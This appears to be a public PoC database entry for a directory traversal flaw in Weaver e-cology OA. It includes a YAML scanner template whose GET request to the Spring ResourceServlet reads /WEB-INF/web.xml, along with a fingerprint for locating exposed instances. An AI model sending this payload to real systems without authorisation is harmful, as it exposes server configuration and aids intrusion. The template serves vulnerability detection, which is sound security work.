e-cology-springframework-directory-traversal: 泛微OA e-cology springframework 目录遍历

2025-08-01 e-cology springframework PoC Public

Description

泛微OA e-cology springframework 目录遍历 app="Weaver-OA"

PoC

id: e-cology-springframework-directory-traversal

info:
  name: 泛微OA e-cology springframework 目录遍历
  author: l1nk3r
  severity: critical
  description: |-
    泛微OA e-cology springframework 目录遍历  app="Weaver-OA"
  reference:
    - https://www.weaver.com.cn/cs/securityDownload.asp
  tags: ecology,directory-traversal
  created: 2023/06/23

rules:
  r0:
    request:
      method: GET
      path: /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
    expression: response.status == 200 && response.body.bcontains(b"<url-pattern>/weaver/")
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities